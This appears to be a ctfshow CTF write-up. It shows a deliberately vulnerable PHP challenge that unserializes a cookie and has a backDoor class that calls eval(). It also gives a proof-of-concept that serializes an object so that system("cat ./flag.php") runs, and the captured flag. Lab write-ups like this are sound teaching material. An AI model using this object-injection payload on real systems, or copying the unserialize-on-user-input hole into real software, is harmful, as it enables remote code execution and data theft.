nginx/1.16.1PHP/7.3.11

    1. <?php
    3. /*
    4. # -*- coding: utf-8 -*-
    5. # @Author: h1xa
    6. # @Date:   2020-12-02 17:44:47
    7. # @Last Modified by:   h1xa
    8. # @Last Modified time: 2020-12-02 20:33:07
    9. # @email: h1xa@ctfer.com
    10. # @link: https://ctfer.com
    12. */
    14. error_reporting(0);
    15. highlight_file(__FILE__);
    17. class ctfShowUser{
    18.     private $username='xxxxxx';
    19.     private $password='xxxxxx';
    20.     private $isVip=false;
    21.     private $class = 'info';
    23.     public function __construct(){
    24.         $this->class=new info();
    25.     }
    26.     public function login($u,$p){
    27.         return $this->username===$u&&$this->password===$p;
    28.     }
    29.     public function __destruct(){
    30.         $this->class->getInfo();
    31.     }
    33. }
    35. class info{
    36.     private $user='xxxxxx';
    37.     public function getInfo(){
    38.         return $this->user;
    39.     }
    40. }
    42. class backDoor{
    43.     private $code;
    44.     public function getInfo(){
    45.         eval($this->code);
    46.     }
    47. }
    49. $username=$_GET['username'];
    50. $password=$_GET['password'];
    52. if(isset($username) && isset($password)){
    53.     $user = unserialize($_COOKIE['user']);
    54.     $user->login($username,$password);
    55. }

    分析:
    触发 backDoor 即可

    poc

    1. <?php
    2. class ctfShowUser{
    3.     public function __construct(){
    4.         $this->class=new backDoor();
    5.     }
    6. }
    8. class backDoor{
    9.     private $code = 'system("cat ./flag.php");';
    10. }
    12. $user = new ctfShowUser();
    13. echo(urlencode(serialize($user)));
    14. ?>

    image.png

    flag
    ctfshow{72d54ea0-eb49-41bc-a7e0-6f8c880f7d0d}